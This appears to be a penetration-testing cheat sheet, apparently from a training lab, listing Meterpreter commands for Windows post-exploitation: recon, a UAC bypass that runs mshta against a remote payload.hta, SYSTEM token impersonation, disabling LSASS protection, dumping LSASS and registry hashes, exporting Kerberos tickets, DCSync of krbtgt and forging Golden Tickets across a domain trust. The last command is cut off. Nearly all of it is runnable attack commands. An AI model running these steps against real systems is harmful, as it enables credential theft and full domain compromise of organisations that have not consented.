
## Host Recon

Generic host info
```
meterpreter > powershell_import /tmp/helper.dll
meterpreter > powershell_execute '[Helper.Local.Enum]::Recon()'
```

Check for Impersonate privilege (SpoolSample)
```
meterpreter > getprivs
```

# Privilege Escalation

Bypass UAC (if local admin)
```
meterpreter > powershell_execute '[Helper.Local.UAC]::BypassShell("mshta http://192.168.49.72/test/payload.hta")'
```

Privesc with SpoolSample (with impersonate privilege)
```
meterpreter > load incognito
meterpreter > powershell_execute '[Helper.Local.Privilege]::CaptureSystemToken()'
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
```

# Dumping Hashes

Parse hashes from registry
```
meterpreter > run post/windows/gather/hashdump
```

Unprotect lsass
```
meterpreter > cd C:\\ProgramData
meterpreter > upload /tmp/mimidrv.sys
meterpreter > load kiwi
meterpreter > kiwi_cmd \"!+\"
meterpreter > kiwi_cmd \"!processprotect /process:lsass.exe /remove\"
meterpreter > creds_all
```

Dump lsass
```
meterpreter > load powershell
meterpreter > powershell_import /tmp/Helper.dll
meterpreter > cd C:\\Windows\\Tasks\\
meterpreter > powershell_execute '[Helper.Local.Enum]::MiniDump()'
meterpreter > download lsass.dmp
... transfer ./lsass.dmp to safe box ...
```

Extract creds from dumped lsass
```
meterpreter > upload lsass.dmp
meterpreter > load kiwi
meterpreter > kiwi_cmd \"sekurlsa::minidump lsass.dmp\"
meterpreter > kiwi_cmd \"sekurlsa::logonpasswords\"
```

Extract tickets from dumped lsass (e.g. after delegation)
```
meterpreter > upload lsass.dmp
meterpreter > load kiwi
meterpreter > kiwi_cmd \"sekurlsa::minidump lsass.dmp\"
meterpreter > kiwi_cmd \"sekurlsa::tickets\"
meterpreter > kiwi_cmd \"sekurlsa::tickets /export\"
meterpreter > kiwi_cmd \"kerberos::ptt [0;9eaea]-2-0-60a10000-admin@krbtgt-PROD.CORP1.COM.kirbi\"
meterpreter > kiwi_cmd \"lsadump::dcsync /domain:prod.corp1.com /user:[DOMAIN]\\krbtgt\"
meterpreter > dcsync_ntlm [DOMAIN]\\[USER]
```

Create Golden Ticket
```
meterpreter > kiwi_cmd \"lsadump::dcsync /domain:prod.corp1.com /user:PROD\\krbtgt\"
meterpreter > run post/windows/escalate/golden_ticket DOMAIN=prod.corp1.com KRBTGT_HASH=[HASH] USE=true
```


Create Golden Ticket for BiDirectional Domain Trust (prod.corp1.com -> corp1.com)
```
meterpreter > kiwi_cmd \"lsadump::dcsync /domain:prod.corp1.com /user:PROD\\krbtgt\"
meterpreter > powershell_execute '[Helper.Remote.Enum]::GetDomainSID("prod.corp1.com")'
meterpreter > powershell_execute '[Helper.Remote.Enum]::GetDomainSID("corp1.com")'
meterpreter > kiwi_cmd \"
```
